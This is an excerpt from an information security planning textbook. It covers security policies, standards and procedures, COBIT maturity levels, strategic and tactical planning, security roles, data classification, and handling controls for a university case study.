Defendants made false and/or misleading statements and/or failed to disclose that: (1) Twitter knew about security concerns on their platform; (2) Twitter actively worked to hide the security concerns from the board, the investing public, and regulators; (3) contrary to representations in SEC filings, Twitter did not take steps to improve security; (4) Twitter’s active refusal to address security issues increased the risk of loss of public goodwill; and (5) as a result, Defendants’ statements about Twitter’s business, operations, and prospects, were materially false and misleading and/or lacked a reasonable basis at all relevant times. – Baker vs. Twitter (Lawsuit) Complaint [1, p. 12]

Executive level management is responsible for strategic business goals (including for IT/security), managing risk, defining policies for the organization, and for staffing security. The previous two chapters addressed risk, including the chapter on Business Impact Analysis. This chapter addresses the remaining executive management responsibilities. Depending on whether you like to work from the top down or bottom up (theory versus details), or whether your interests are mainly technical versus business, this chapter may be completed before or after the Tactical Security Planning chapters, if desired. If you have little knowledge of security technology, and you plan to work with Policy in the Security Workbook, you may find you have better security knowledge after completing the Tactical Planning section.

6.1 Documenting Security: Policies, Standards, Procedures and Guidelines Security is a large, complex system. To implement effective security requires attention to technology, physical security, and administrative (or people) issues. Working with one security area will impact other areas. For example, aspects of business continuity impact information security, which impacts network and physical security. All areas impact metrics and personnel security, since roles must be coordinated and permissions controlled. It takes a lot of documentation to plan this

© The Author(s), under exclusive license to Springer Nature Switzerland AG 2024 S. Lincke, Information Security Planning, https://doi.org/10.1007/978-3-031-43118-0_6

111

112

6  Governing: Policy, Maturity Models and Planning

sophisticated system, train staff, and provide a knowledge database for staff. Documentation for security includes policies, procedures, standards and guidelines [3, 4]. See Fig.  6.1. Policies are management directives. Policies do not describe how something will be achieved, but does order that something be accomplished. Policies may be high level or detailed. The Security Workbook has a chapter with proposed policies that may be edited for your organization. Examples of high level policies are shown here: • Risks shall be managed utilizing appropriate controls and countermeasure to achieve acceptable levels at acceptable costs. • Monitoring and metrics shall be implemented, managed, and maintained to provide ongoing assurance that all security policies are enforced and control objectives are met. Standards are a detailed implementation of a policy. Standards are mandatory and are often described with the word ‘shall’ to indicate ‘requirement’. Examples of standards might include the list of permitted software on a computer; the required length and attributes of a password; and the format of a backup disk label. Procedures are a description of “how to” complete a task. A procedure often includes numbered steps to take to complete a task. Examples of procedures might include how to perform a disk backup; how to complete a multi-step test for a security audit; or steps to take when a hacker attack is detected. The Security Workbook is a series of procedures, guiding the reader in designing security. Guidelines are recommendations that should be followed  – in some cases, guidelines may not apply. Guidelines are often written with the word ‘should’ to indicate ‘recommendation’. Examples of guidelines might be how to create a password (e.g., use the first letter for three lines of a song), or which websites you are permitted to access at work. This textbook is a guideline: it tells you how to do things, but it is up to you as to what you actually choose to do. The choice of language in writing policies is important. The word shall indicates a mandatory requirement, and may be specified to ensure proper or required

Fig. 6.1  Policies, procedures, standards, and guidelines

6.2  Maturing the Organization via Capability Maturity Models and COBIT

113

operation [8]. Should denotes a recommended approach, often used within a guideline. May indicates a permitted approach or action, where no recommendation is suggested. Might suggests a possibility, and while it is useful in a risk document, it is not recommended in a policy document. Some policy documents demonstrate detailed policies, which could also be described as standards. They include: • Acceptable Usage Policy: Describes permissible usage of IT equipment/ resources • End-User Computing Policy: Defines usage and parameters of desktop tools • Access Control Policies: Defines how access permissions are defined and allocated • Data Classification: Defines data security categories, ownership and accountability The Acceptable Use and/or End-User Computing Policies are normally signed by employees to indicate that they have read the documents. You will create a Data Classification policy as part of the Information Security chapter. After policy documents are created, they must be officially reviewed/accepted, maintained, disseminated, and tested for compliance. The security function is toothless and severely handicapped without a good set of management-supported policy documentation.

6.2 Maturing the Organization via Capability Maturity Models and COBIT Executive management must decide security policies for the organization, but must also understand the maturity level of its IT/security organization. Does the organization understand security? What aspects of security do we do well…and not so well? Are we dependent on key people remaining with the organization for our security implementation? Do we know how much security costs us, and how well we actually perform? These are some of the questions management should know the answers to. A Capability Maturity Model helps an organization understand where they are performing relative to a standard. There are two well-known Capability Maturity Models related to IT/Security: The COBIT model and the Systems Security Engineering Capability Maturity Model (SSE-CMM) model. The SSE-CMM was adopted by the International Standards Organization (ISO) as ISO/IEC Standard 21827. ISO in addition publishes a set of security standards from ISO/ IEC 27000 to 27050. These standards address basic security, topical areas (e.g., risk, audit, network security) and industries (e.g., finance, energy utilities). The COBIT model was developed to help organizations achieve Sarbanes-Oxley compliance. (Sarbannes-Oxley is American regulation meant to prevent financial

114

6  Governing: Policy, Maturity Models and Planning

statement fraud for companies listed on an American stock exchange – this is important to ensure value of the company’s stock to stock investors.) Figure 6.2 shows the maturity levels for the COBIT model, which are consistent with the Capability Maturity Model Integration (CMMI) international standard [6]. SSE-CMMI and COBIT are similar in nature. One main difference between COBIT and this text is that this text focuses on basic security planning, whereas COBIT®2019 addresses a model of full IT/IS maturity. For full implementation of COBIT®2019, see ISACA’s reference: COBIT 2019 Framework: Introduction and Methodology. Additional detailed “COBIT Focus on” references are available for small and medium enterprises, information security, DevOps, and information and technology risk. An organization might start at Level 0 Incomplete Process. Organizations at this level may be doing some or considerable IT/security practices. However, the practices are not fully defined and implemented, nor are they documented. What is done is accomplished by competent individuals. Level 1 Initial Process occurs when many goals may be functional. For example, when this full textbook is read, understood, and implementation is started, an organization would be at level one, using this text as a standard (not to be confused with adhering to COBIT). However, the text can be implemented without the Security Workbook fully being documented. This would mean that if up-to-speed staff left, the new staff would need to read the textbook and discuss implementation with others. Level 2 Managed Process means that the organization uses project management and configuration management to manage projects. Plans are documented with schedules: for example, security enhancement and compliance testing (or audit) projects are scheduled and managed. Projects result in work product documents, which are evaluated before acceptance. Work product documents are maintained in

Fig. 6.2  Capability maturity model integration [6]

6.2  Maturing the Organization via Capability Maturity Models and COBIT

115

a library (also known as configuration management), where previous versions are accessible and controlled. Thus, security documentation is partially developed; if key people leave, some key process knowledge will be lost. Level 3 Defined Process means that security policies, standards, procedures, and guidelines are fully documented and implemented across the organization. The organization has not only completed the Security Workbook’s Chapter 2 Strategic Security Plans and Chapter 3 Tactical Security Planning, but has also completed Chapter 5 Operational Security Plans. Chapter 5 includes all the technical procedures to implement backup/reload, incident response procedures, etc. This complete documentation is followed by the organization. If key people leave, new people can easily follow the directions of existing organizational documentation. Level 4 Quantitative Process is achieved when we maintain a set of metrics to measure how our security actually performs. Do you know how many hacker attacks you defend against monthly, and how many attacks succeed? When the Metrics chapter of this book is seriously used to understand security compliance and effectiveness, and these security metrics achieve organizational goals, then the organization has achieved Level 4. Level 5 Optimizing Process sets objectives for security metrics to achieve business goals. For example, fraud may eat 5% of organizational income, and the organization would like to reduce this number to 2% or less. Since the organization knows the full level of fraud or security attacks or security costs, and desires to achieve improved performance for business reasons, then new goals are periodically set and projects aim to achieve higher effectiveness. Achieving higher levels of COBIT is not only complex from the maturity perspective, but also from a breadth perspective. At a high level, COBIT®2019 has five domains: (1) Evaluate, Direct and Monitor; (2) Align, Plan and Organize; (3) Build, Acquire and Implement; (4) Deliver, Service and Support; and (5) Monitor, Evaluate and Assess [6]. Thus, COBIT covers information security, in addition to other topics, such as: manage service agreements, suppliers, quality, change, capacity, software builds, knowledge, operations, budget and costs, etc. Within these 5 domains, COBIT®2019 addresses 40 objectives in total [6]. Each objective contains a set of practices, which in turn contains a set of activities. For example, the “Manage Security Services” objective contains objective-practices, including “Protect against malware”. This practice in turn contains five activities including “Communicate malicious software awareness and enforce prevention procedures and responsibilities…” [7]. Achieving even COBIT Level 1 is quite an accomplishment. One way to measure progress towards this goal is to create a chart listing the 40 processes, and grading your implementation for each process as N=Not achieved: 0–15% fulfillment; P=Partially achieved: 15–50% fulfillment; L = Largely achieved: 50–85% fulfillment; and F=Fully achieved: 85–100% fulfillment [2]. There is security documentation for all levels. This book and workbook is a security planning tool, which addresses security from a high level. Maturity models help organizations understand where they fall in managing security. Other documentation helps with technical details of how to implement specific security functions,

116

6  Governing: Policy, Maturity Models and Planning

including: ISO/IEC 270001 and subsequent ISO documents, NIST documents, and security web sites, such as SANS. Security experts, such as Security+, CISSP, CEH and CISA certified professionals can help to configure and test security settings.

6.3 Strategic, Tactical and Operational Planning IT and information security should fit within the business plans of the organization. Strategic planning is decided at the executive level. They consider long-term (3–5  year) planning, which includes organizational goals and regulatory compliance (and for IT: technical advances). The tactical plan takes the strategic plan, and defines what needs to be accomplished in the next year to achieve strategic goals. Operational-level plans are detailed or technical plans used to implement the tactical plan. An example of a strategic plan item might be: incorporate the business; market the new Super-Widgit product; or achieve COBIT Level 1. Assuming the third COBIT goal, a tactical plan might define which key areas in COBIT the organization plans to address in the first year, and what might be due each quarter (March, June, September, December). An operational plan would describe the intermediate deadlines deliverables and key persons responsible for the tactical goals. By allocating responsibility to specific people, setting dates and naming clear deliverables, progress can be determined and measured. For larger projects, project management may involve many tasks and people. In this case, PERT and GANTT chart tools can be used to organize people (resource allocation), task deliverables and due dates. An example of such planning for a business considering incorporation is shown in Fig. 6.3. To pass an external audit (at the strategic level) requires performing risk analysis, Business Impact Analysis, and defining policies, which are the tactical goals for the first year. The operational plan starts the detailed task allocation to accomplish the tactical goals. Normally operational goals involve low-level managers, but in this case, the organization is just starting out and upper management must hire the appropriate people. The development of the best security is a joint responsibility of the information security function and the business function. Business ensures that the security program is in alignment with business objectives. Security helps the business side understand various threats and risks. Business knows which assets to protect, while security knows how to protect them. When things go awry, business sets the priorities, which security implements. Security will lead the efforts and do much of the detailed security work; business helps to define administrative controls, but must also adhere to these controls. Thus, it is critically important that the  business and security functions plan security together. Figure 6.4 lists the steps involved with security development process. Note that arrows pointing to the data or people show where the data or committee is created. Arrows pointing to the process show where the data or people are used as input to the process.

117

6.3  Strategic, Tactical and Operational Planning Strategic Plan Objective

Time frame

Tactical Plan: Objective

Time frame

Incorporate the business

5 yrs

Perform risk analysis 6 mos.

Pass an external audit

4 yrs

Perform BIA

1 yr

Define policies

1 yr

Operational Plan: Objective

Responsibility

Deliverable

Timeframe

Hire an internal auditor and security professional

VP Finance

New employees hired

Feb 1

Info Sec. Steering Committee has one meeting; people are committed

March 1

Document: Security Issues

April 1

Establish security team of business, IT, personnel

VP Finance & Chief Info. Officer (CIO)

Team initiates risk analysis and prepares initial report

CIO & Security Steering Committee

Fig. 6.3  Strategic, tactical and operational planning (workbook exercise)

Fig. 6.4  Introducing security to an organization

The best method to introduce security into an organization, and align information security with business, is to create an Information Security Steering Committee. This committee is made up of security and business management. First, an organization chart will identify potential key players that should be befriended. Various stakeholders are interviewed to determine important assets, threats, security issues and security regulation. These issues are combined into a Security Issues document.

118

6  Governing: Policy, Maturity Models and Planning

Many of the key people expressing interest and concern can be invited to become part of the Information Security Steering Committee. This committee can then develop a set of Security Policies from the Security Issues, which are presented to management for review and approval. Once approved, the steering committee uses the Security Policies to develop security training materials and compliance test plans. After cycling through training and testing, the steering committee can perfect training and testing materials.

6.4 Allocating Security Roles and Responsibilities Larger organizations will have many people involved in the security process. Executive and business management have important part-time roles in security [3– 5]. Without their interest, the security organization will have a hard time being effective. The Board of Directors is responsible for reviewing risk assessment and Business Impact Analysis results, ensuring adherence to regulation, and defining the tone from the top, including penalties for non-compliance of policies. Executive management’s concerns with security include complying with regulation, limiting liability, instituting policy, and controlling risk. They are responsible for instituting a security organization and monitoring its performance through measurements or metrics. Chief Information Officer (CIO) heads the IT department, while the Chief Information Security Officer (CISO) heads up information security. The CIO’s main concern is providing computing service and performance, while the CISO’s mainly concerns are security, privacy and regulation. Since these two often compete for resources and attention, it is preferable if they both report directly to executive management, instead of one reporting to the other. The CISO is not to be confused with the Chief Security Officer, who is often responsible for physical security, including guards, close circuit TV, etc. Very large organizations may also have a Chief Risk Officer (CRO), a Chief Privacy Officer (CPO) who protects customer and employee privacy, and/or a Chief Compliance Officer (CCO) who ensures the organization complies with policy and regulation. Alternatively, these positions may be wrapped into the CISO job, which may instead be called the Information Security Manager position. As mentioned earlier, it is critical that the security function, headed by the CISO, deals closely with business management to lead the security planning and testing efforts, in addition to authorizing access to IT applications. However, the CISO must have extended relations with all aspects of the business. The CISO must deal with executive management to help plan security strategy, perform risk management, and define policy. The CISO deals with human resources to establish hiring and training standards, define security roles and responsibilities, and handle employee-related security incidents. The CISO deals with the legal department for laws and regulation, and with purchasing concerning security requirements in

6.4  Allocating Security Roles and Responsibilities

119

Requests for Proposals (RFP) and contractual requirements. The CISO works with IT for security monitoring, incident response and equipment inventory. The CISO or security function works with software development to define security requirements, including access control. The CISO or security functions deals with quality control for security requirements/review, change control, and security upgrades/ testing. Other groups are important in that security personnel work closely with them. Quality Control tests an end product, to validate that the end product (for example software) is free from defects and meets user expectations. Quality Assurance ensures that staff follow defined quality processes during the design or building of a product: e.g., following standards in design, coding, testing, or configuration management. Compliance certifies adherence to organizational policies and national regulations. For example, compliance may listen to select help desk calls to verify proper authorization occurs when resetting passwords. The information security department includes other positions, including the Security Architect and Security Administrator [4, 5]. The Security Architect is a security engineer, who designs or evaluates security for technology controls: secure network topologies and access control, as well as administrative controls: security policies and standards. They work with compliance, risk management, and audit. Their five main areas of concern include: • Policy: validate that control systems’ rules align with policy and sufficiently restrict access; • Effectiveness: ensure controls are reliable, automated, and protective without restricting business function; • Placement: ensure controls safeguard important assets via layers or redundancy; • Implementation: certify that controls are tested and monitored to ensure continual effectiveness; • Efficiency: understand the impact to applications and their security when a control fails. A Security Administrator is a system administrator for the security systems. They allocate login/passwords (or authentication/identity management) and permissions (or access control), according to a data owner’s decisions. They also configure security, manage patches, test security controls, collect/report security metrics, monitor controls for security violations, and resolve attacks. Other administrative responsibilities may include preparing a security awareness program and reviewing and evaluating security policy. To summarize this chapter, IT and security organizations must align to organizational goals. To align security and the organization, it is important to develop an information security steering committee. We have also reviewed the security responsibilities of each security role. Once a security plan is developed, it is important to document and train these roles to perform their security responsibilities properly. We have also introduced the COBIT maturity model, which evaluates an organization’s security and improve its security posture.

120

6  Governing: Policy, Maturity Models and Planning

6.5 Questions 1. Vocabulary. Match each meaning with the correct word. Policy Guideline Procedure Standard

Strategic plan Quality assurance Chief security officer Maturity model

Operational plan Quality control Tactical plan Chief information security officer

(a) A measure of the sophistication of the security process in an organization. (b) An executive level business plan focusing on 3–5 years in the future. (c) A detailed or technical business plan. (d) A detailed description of a security rule. (e) A ‘how to’ guide to accomplish a task. (f) A function which tests to ensure a business process occurs in the expected way. (g) A function which tests to ensure the end product is of sufficient quality. (h) A management plan that addresses the next year. (i) A high-level management directive. (j) A suggested implementation of a security rule. (k) The highest level business manager in charge of computer security. 2. Planning COBIT. Assume that you are a CISO and you have just brought your organization to Level 2 in COBIT’s capability maturity model. Your president has announced that achieving level 3 is a strategic priority for the next 5 years. You currently have little security documentation, although your staff has been recently trained. Create a Tactical Plan for the next year, and an Operational Plan for the next quarter to help achieve this goal. (You may review the workbook to determine which aspects might be interesting to implement. Note: There are multiple right answers  – the process is important. You may state your assumptions.) 3. Policy, Standard, Procedure, Guideline. Review the chapter on risk. What aspects of this text or workbook chapter might be considered a policy, standard, procedure and guideline? If you do not find an example of one of these, write an example.

6.5.1 Health First Case Study Problems For each case study problem, refer to the Health First Case Study. The Health First Case Study and Security Workbook should be provided by your instructor or can be found at https://sn.pub/lecturer-material.

References

Case study Developing a code of ethics IT governance: planning for strategic, tactical, and operational security Security program development: editing a policy manual for HIPAA

121 Health first case study ✓ ✓ ✓

Other resources Security workbook Security workbook: Appendix B HIPAA slides or notes Security workbook, HIPAA slides or notes (security rule slides)

Note that the case: Developing a Code of Ethics can also be used for the Chap. 2

References 1. Baker W (2022) Baker vs. Twitter complaint, case 2:22-cv-06525 document 1 filed 13 September 2022. https://s3.documentcloud.org/documents/22418476/baker-­v-­twitter-­complaint.pdf 2. ISACA (2012) COBIT® 5: a business framework for the governance and management of enterprise IT. ISACA, Arlington Heights, pp 41–45 3. ISACA (2015) CISM® review manual, 15th edn. ISACA, Arlington Heights 4. ISACA (2019) CISA review manual, 27th edn. ISACA, Arlington Heights 5. Harris S (2008) CISSP® all-in-one exam guide. McGraw Hill/Osborne, New York 6. ISACA (2018) Introducing COBIT2019 overview, November 2018. ISACA, Arlington Heights 7. ISACA (2018) COBIT 2019_Governance-management-objectives-practices-activities_ Nov2018.xlsx. ISACA, Arlington Heights 8. WiFi (2020) WPA3™ specification Version 3.0. Wi-Fi Alliance, Austin

Part III

Tactical Security Planning

Tactical security planning combines technology and business to a higher degree than strategic security planning, which focuses more on business. This section gets into the nuts and bolts of security.

1.1  Important Tactical Concepts Unfortunately, security is complex and not entirely predictable. Malware lodged into your home laptop can result in temporary identity theft of your credit card. However, malware lodged into a power utility server may bring down power for many communities, as it did with Stuxnet. This variability in the effect of security occurs because computer networks are a large interconnected system. Network interdependencies are complex and may generate new possibilities, called emergent properties [1]. Consider that when hydrogen and oxygen combine to create water, this combination results in vast new possibilities, unusual considering its two ingredients. Similarly, when iron and nickel are combined, steel emerges, which is far stronger than either of its parts. Similarly, a combination of attacks may cause more damage than any individual attack launched by itself. The three basic goals of security to consider throughout this section is CIA: Confidentiality assures that information (and equipment) is accessible only to authorized persons; Integrity assures that information is accurate, modified only by authorized persons in a valid way; and Availability assures that information is accessible to authorized persons when they need to access it. These three goals need to be protected across three domains: during storage (e.g., on disk or removable memory), during transmission, and when data is processed. Restricting access to all protected assets is one way to guarantee security – but this also prevents organizations and people from doing any functions related to these assets. Thus, there is a balance between security and usability. Instead of simply restricting all access, a little extra thought in planning can keep assets safe, while enabling proper usage.

124

Part III  Tactical Security Planning

Defense in Depth is a method which requires intruders to counter multiple defenses before successfully achieving their goal. Traditional security, such as a castle-fortress, shows excellent security layering. A cascading defense means that as an attacker penetrates a layer, she runs up against other defensive layers. For example, castles were often built on hills or mountains, with trees cut down immediately before the castle walls. Alternatively, there may be a moat. In either case, an attacker cannot get close to the castle without being slowed down and seen. The huge stone castle walls are a second barrier, with armed guard posts to shoot intruders. Thirdly, there is a single entrance, accessible via drawbridge, and protected by guards. Fourth, there may be internal spies inside the castle. Thus, to invade a castle in olden times required beating defense after defense mechanism. The same is sound advice for today’s computer networks. Defense in Depth is a concept to consider throughout the book. A simple defense in depth design for a computer network is shown in the figure below. This onion has many layers of defense mechanisms. Although all layers are useful, some layers can be bypassed like a modern day plane to the castle-fortress: the firewall may be bypassed via an internal employee or wireless LAN access; authorization may be bypassed with an SQL attack to an unprotected application. An attacker may be able to bypass the authorization, access control and segregation of duties layers with valid account credentials; therefore, security awareness training and blocking frivolous social websites and personal email may be critical defenses to add to this design (Fig. 1). This section contains a partial security design for Einstein University (EU). Tables are copied from the Security Workbook: text in typed letters is the skeleton text provided for your editing, whereas printed text shows modifications for the EU case study. While this section helps you to design security, it does not implement Information Access Control (Permissions) Authorization (Login credentials) Segregation of Duties Firewall

Fig. 1  Defense in Depth

Part III  Tactical Security Planning

125

security. At the end of each Workbook design section is a description of the required steps a security administrator/architect will have to take to complete the job. It is recommended that these chapters are performed in order. Information security provides a foundation for Network Security, which provides a foundation for later chapters. Since security is a system, referencing back and fixing earlier chapters, when working with later chapters, is part of the normal process.

Chapter 7

Designing Information Security

If you store it, they will come. – Justine Young Gottshall, Partner, InfoLaw Group [2]

Previous chapters have emphasized that criminals and spies concentrate on stealing, modifying or destroying financial account information, trade secrets, and internal organization data. This chapter is all about protecting information assets via the three goals of security, CIA: confidentiality, integrity, and availability. Two additional requirements that may apply include legal and privacy liability. We achieve these goals by classifying information assets and then defining how each class of assets should be protected. That, in a nutshell, is what this chapter is all about.

7.1 Important Concepts and Roles Important concepts in information security consider retaining and applying CIA to information. The first is minimization related to Privacy: personal or private information should only be retained when a true business need exists. Private data is a liability; if you can eliminate information or retain the information for a minimal duration as possible, you limit liability. Protected personal information (PPI) is protected by national and/or state laws and generally includes social security numbers, state identification numbers, driver’s license numbers, financial account or credit card information, and medical information (including biometric/DNA data). If you retain this information, it is best to eliminate them or retain them for as short a period as possible, unless you have a real business or compliance need. For many organizations, eliminating credit card information is not on option. In this case, Need-to-Know limits the number of people who have access to this information. To maximize the first CIA goal of Confidentiality, persons should have ability to access data sufficient to perform their primary job role and no more. Authentication is the function to ensure that systems accurately identify a user on the system [8].

© The Author(s), under exclusive license to Springer Nature Switzerland AG 2024 S. Lincke, Information Security Planning, https://doi.org/10.1007/978-3-031-43118-0_7

127

128

7  Designing Information Security

It is not only viewing private information that is an issue. The second CIA goal of Integrity ensures that information is correct. To achieve this, only people who should be able to change information are given permissions to do so. Least Privilege ensures that persons should have ability to do tasks sufficient to perform primary job and no more. Access control in a computer system enables defining permissions that employees, contractors and/or volunteers should have, and these permissions, or authorization, should allow them to create, view, modify, and delete only the necessary information to do their jobs. At a higher level, Integrity is best achieved using Segregation of Duties, which ensures that no person can assume two roles: Origination, Authorization, Distribution, and Verification. Employees who have worked at a company for a long time tend to accumulate many permissions. The Data Owners or the personnel office should change permissions for employees as their jobs change, to ensure personnel’s permissions are consistent with their current primary job function. A Security Team should design and implement computer applications, processes and systems with segregation of duties in mind. The third CIA goal, Availability, is concerned that authorized people have access to information when they need it – system failures, slowdowns, and hacker attacks all prevent systems from being available. Availability is addressed in part with Business Continuity, Physical Security, and this chapter. It is helpful, but not absolutely necessary, that readers complete the Business Continuity chapter before continuing. Business, IT and security all collaborate to protect data, as shown in Fig. 7.1. Important business roles in Information Security include the Data Owner and Process Owner, who may be the same or different people. The Data Owner or Information Owner is the manager for a business unit who defines which employees get which permissions [4]. As new employees are hired, or jobs change, these permissions should change as per the guidance of the Data Owner. The Process Owner is a manager for a business unit who understands how the business works, and how it should be best protected. They are part of the Information Security Steering Committee, and help to define security documentation and training materials, and enforce policy. Important technology roles include the Security Architect, who understands security technology and develops security policy, the Data Custodian, and the Security Administrator. The Security Administrator is the systems administrator for security systems. The Data Owner defines the permissions and may enter the permissions directly on a computer. If instead the Security Administrator is the person who physically enters permissions, the Data Owner must provide a written, signed copy of the access control orders. Preferably, the Data Owner would hand the signed document to the Security Administrator to ensure that critical permissions could not be faked. The Data Custodian may report to security or IT. They are responsible for protecting the information. This includes data backup/restore, verifying that backups are valid, and documenting actions related to the data.

7.2  Step 1: Classify Data for CIA

129

Fig. 7.1  Security staff involved with Data Security (or not)

The steps we will take in designing information security is first to classify data, so that we can treat some data more securely than other data. Step 2 will define controls for each class of data. Step 3 will allocate roles and permissions so that only the appropriate people can access that data.

7.2 Step 1: Classify Data for CIA Simplicity in security design enables people to easily design, understand, and implement security. Security classifications are one way to achieve such simplicity and minimize the complexity of implementation. Information security uses two classification systems: Sensitivity Classification relates to confidentiality and integrity, whereas Criticality Classification relates to availability [4]. Sensitivity Classes usually include 3–5 classes. Table 7.1 shows an example of how skeleton text in the Security Workbook was modified to describe sensitivity classes for Einstein University. For the university, three classes look useful, but the Proprietary class can be dropped. For the Confidential class, the Description column text is modified to explicitly refer to privacy laws and standards. Well-known U.S. government sensitivity classes include Top Secret, Secret, and Classified [5]. As defined in the Business Continuity chapter, the Criticality Classification relates to availability. This classification scheme categorizes data by how long the

7  Designing Information Security

130

Table 7.1  Sensitivity classes for Einstein University (workbook exercise) Sensitivity classification Proprietary

Confidential

Privileged

Public

Description Protects competitive edge. Material is of critical strategic importance to the company. Dissemination could result in serious financial impact Information protected by FERPA, PCI DSS and breach notification law. Shall be available on a need-to-know basis only. Dissemination could result in financial liability or reputation loss Should be accessible to management or for use with particular parties within the organization. Could cause internal strife or divulge trade secrets if released Disclosure is not welcome, but would not adversely impact the organization

Information covered

Student info & grades, payment card info., employee info. Professor research, student homework, budgets Teaching lectures

Table 7.2  Information asset inventory: course registration (workbook exercise) Asset name Value to organization Location Sensitivity and criticality classifications IS system/server name Data owner Designated custodian Authentication & accountability controls Granted permissions

Course registration Records which students are taking which classes IS Main Center Sensitive, vital Regisoft Registrar: Monica Jones IS operations: John Johnson Login/password authentication: complex passwords, changed annually Logs: staff access to student records Department staff, advising: read Students, registration: read, write Access is permitted at any time/any terminal

company can survive without automated or computerized access to the data. Classes include: • Critical: Cannot be performed manually. Tolerance to interruption is very low, • Vital: Can be performed manually for very short time, • Sensitive: Can be performed manually for a period of time, but may cost more in staff, • Nonsensitive: Can be performed manually for an extended period of time with little additional cost and minimal recovery effort. Not all data in the organization needs to be explicitly classified – however, the most important data should be. The next step is to create an Information Asset Inventory, where data can be classified with a Criticality and Sensitivity class. An example of Course Registration (Table  7.2 from workbook) defines each important asset, its sensitivity and criticality class, people who help to secure it, and people or roles

7.3  Step 2: Selecting Controls

131

who have access to it. To start, it may be great to define this for your most critical and sensitive data. In this Course Registration example, Granted Permissions briefly lists who has access to this application, without being specific as to what they may or may not access within it. A more detailed definition of permissions is part of step 3.

7.3 Step 2: Selecting Controls A classification scheme defines the controls used to protect confidentiality and availability, including how data is marked, distributed, handled, stored, transmitted, archived, and disposed of. Table 7.3 shows suggested handling for various sensitivity classes, amended in red for a university environment (mainly involved in teaching). It is important that all staff understand the classification process and how data should be handled. Labeling & Handling: It is possible to use a “Confidential” label as a header or footer on all pages, as well as the title page. The U.S. government uses cover sheets with various colors to reflect sensitivity classes [5]. Disk Storage and Archive: Two issues to be resolved include length of period to hold data, and how to store data. Security regulations often specify a length of time to store data. For HIPAA, data shall be retained for 6 years. For Sarbannes-Oxley, audit papers must be retained for 7 years, and records used to assess internal controls over financial data shall never be disposed of [6]. Encryption is the best technique to store sensitive data. Encrypted disks are considered safe under the U.S. State Breach Notification Laws. Therefore, if you store any protected information (formally known as Personally Identifiable Information or PII), it should be encrypted, whether it is on disk or backup. It is possible to encrypt specific files or the whole disk. This is a low-cost control with the only precaution that if the encryption key is lost, your data cannot be retrieved. Encrypting a disk is not entirely safe: when you power up your computer, the  encryption key may be communicated. Any subsequent accesses through the operating system, e.g., by you or a hacker, may enable either to see the data. The data is safely encrypted, however, if a powered-down encrypted laptop or encrypted backup disk/ tape is lost or stolen. The issue remains of how to protect decrypted data after power up. Access control, which adheres to need-to-know and least-privilege concepts, ensures that only authorized people have access. Then, it may be important to prevent even authorized people from writing sensitive data to portable storage. It is possible to install only CD readers, instead of CD reader/writers, and disable USB drives. These actions would have prevented one Wikileak covert data exfiltration in 2010, when a Private overwrote a Lady GaGa CD daily with proprietary U.S. government information [7]. Transmission/Migration: Encryption is important to protect data being transmitted. Encryption can occur on an application basis, or link basis affecting all

132

7  Designing Information Security

Table 7.3  Handling of sensitive information (workbook exercise) Access

Confidential Need to know, least privilege, multifactor authentication

Paper storage

Locked cabinet, locked room if unattended

Disk storage

Encrypted Server rooms: camera monitor, multifactor authentication Label ‘confidential’, clean desk, low voice, no SSNs, ID required Encrypted with integrity checks

Labeling & handling Transmission/ migration Email handling No email transmission Data De-identification occurs through warehousing summary reports based on course summaries or major summaries Archive & Encrypted backups with integrity retention checks Grades retained online 2 years after graduation; afterwards maintained offline. Other information retained only for 6 months after graduation; 1 year after absence Bring your own Files and documents may be data written and read but not copied to local storage media Disposal & Degauss and damage disks destruction Shred paper Cloud storage Approved applications only; must meet all requirements specified above; see cloud section for cloud requirements Employee Purge access rights termination Ensure no data exfiltration before employee release Special notes When a student asks, email of grades for one student is permitted with email security notice appended

Privileged Need to know, least privilege, multifactor authentication Locked cabinet, locked room if unattended Password-protected, encrypted

Public Need to know

Clean desk, low voice Encrypted

No requirements

No requirements Not applicable

No requirements N.A.

Locked room if unattended Password-protected

Encrypted

Encrypted backups No requirements with integrity checks

No copying to local storage media

No requirements

Secure wipe Shred paper Approved applications only; meets above requirements. Purge access rights

Reformat disks Approved applications only; meets above requirements Purge access rights

transmissions. Email may not be encrypted, but Secure Shell (SSH) and Secure File Transfer (SFTP) are two applications that enable encrypted remote login and file transfer respectively. Further discussion of encryption transmissions are addressed in the next chapter on Network Security.

7.3  Step 2: Selecting Controls

133

Repair, disposal, destruction: These should be carefully handled, since a criminal technique, dumpster diving, is messy but seriously useful in obtaining confidential information. For repairs, disks can be removed before shipment to safeguard disk data. Disks to be discarded should not simply be reformatted; this usually wipes clean only the disk’s header index directory, which is similar to clearing out the table of contents for a book, but leaving the rest of the book intact! A secure wiping process writes a pattern over the entire disk, which is better since it is the equivalent of overwriting the entire ‘book’ – but in very secure situations magnetic traces of the previous data may still remain. Damaging the disks, by disassembling them and taking a hammer to them is a low cost technique that when added to secure wipe can be effective for mid-level security data. Alternative means may include incineration. For highly secure information, it is useful to demagnetize a disassembled disk, which is known as degaussing [5]. Peripheral memories, such as DVDs, CDs, flash drives and tapes, should be similarly cleaned or destroyed. In these cases, shredders, grinders, incinerators or disintegrators may all be useful in destroying the media. Demagnitizing works on magnetic diskettes and tapes, but not on optical DVDs, CDs or electronic flash (thumb) drives [14]. It is not possible to delete remote files, e.g., in the cloud. Those files should be encrypted. It is possible then to delete the encryption keys, making the data unreadable. This is called crypt-shredding and is used with remote disks (e.g., cloud) [16]. Other non-technical controls, such as physical controls, will be addressed in the Physical Security Chapter. This later chapter will also be important for addressing availability and its criticality classes.

7.3.1 Selecting AAA Controls In this section we consider authentication, authorization, accounting  (AAA) and audit. Authentication and authorization enable entry to a computer and applications, while accounting (or  accountability) makes users responsible for their actions. Authentication involves identifying yourself to a computer (e.g., Terry Dinshah) and authenticating often via login/password, whereas authorization (or access control) determines which permissions the known user (Terry Dinshah) can do [15]. There are four levels of controls: access to the network, the computer, the application, and various packages or subsystem/servers used by the application, such as a database system. Accountability ensures that users are responsible for their actions, through command or transaction logging. Audit is a control to confirm the implementation of the three As, as well as other controls. Table 7.4 outlines some of these controls.

7  Designing Information Security

134 Table 7.4  AAAA controls Control Authentication Access controls Accountability Audit

Systems Complex passwords, multifactor authentication, biometric systems. Mandatory, role based, attribute based, physical and/or discretionary access control, Bell and La Padula Model Logs, transaction audit trails, attack signature detection, trend variance detection Official audits of policies, procedures, staff awareness, security training; management reports monitor accountability

